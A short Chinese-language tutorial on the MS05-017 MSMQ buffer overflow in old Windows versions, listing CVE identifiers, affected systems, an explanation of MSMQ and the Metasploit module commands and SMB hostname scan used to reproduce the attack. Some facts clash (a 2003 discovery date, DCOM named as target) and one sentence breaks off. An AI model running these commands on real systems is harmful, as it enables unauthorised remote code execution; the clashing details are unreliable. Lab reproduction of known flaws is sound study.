ms05-017漏洞原理與復現

漏洞描述

此漏洞由lds-pl.net漏洞研究組在2003年7月16日發現，漏洞及exp在網上公開后，網上出現了大量的×××實例，利用此漏洞的蠕蟲也大量出現。

漏洞編號

CVE-2005-0059
OSVDB-15458
MSB-MS05-017
BID-13112

×××目標

DCOM接口的服務器端

影響系統

    Microsoft Windows XP Service Pack 1
    Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
    Microsoft Windows 2000 Service Pack 4
    Microsoft Windows 2000 Service Pack 3
    Microsoft Windows 98 Second Edition (SE) 
    Microsoft Windows 98

漏洞原理

msmq在將輸入的字符串傳遞到緩沖區之前沒有執行正確的驗證，因此，可通過傳遞特制的msmq消息來觸發漏洞造成緩沖區溢出漏洞。漏洞可導致遠程代碼執行、本地提權。由于msmq

概念解釋

1. msmq( MicroSoft Message Queuing， 微軟消息隊列)是在多個不同的應用之間實現互相通信的一種異步消息傳輸模式，互相通信的應用可以位于同一臺機器上，也可以分布于網絡空間中的任意位置。msmq實現原理：消息的發送者將想要發送的消息發送至一個message中，然后保存至一個系統公共空間的消息隊列（Message Queuing）中，需要接受message的應用從Message Queuing中取出Message進行處理。msmq在消息傳遞時，需要借助hostname來通信。

metasploit exp可用目標

Windows 2000 ALL 
Windows XP SP0-SP1 (English)

metasploit利用ms05-017

利用此payload需要netbios hostname、ip、port三項內容

use exploit/windows/dcerpc/ms05_017_msmq
set hname <target hostname>
set rhost <target ip>
set rport <target port>
run -j

msf中查看hname

use scanner/smb/smb_version
set rhost <target ip>
set threads 24
run

不使用metasploit情況下利用ms05-017

暫未發現，后續補充

參考文章

1. MS05-017 Microsoft Message Queueing Service Path Overflow
2. Virus Encyclopedia
3. MSMQ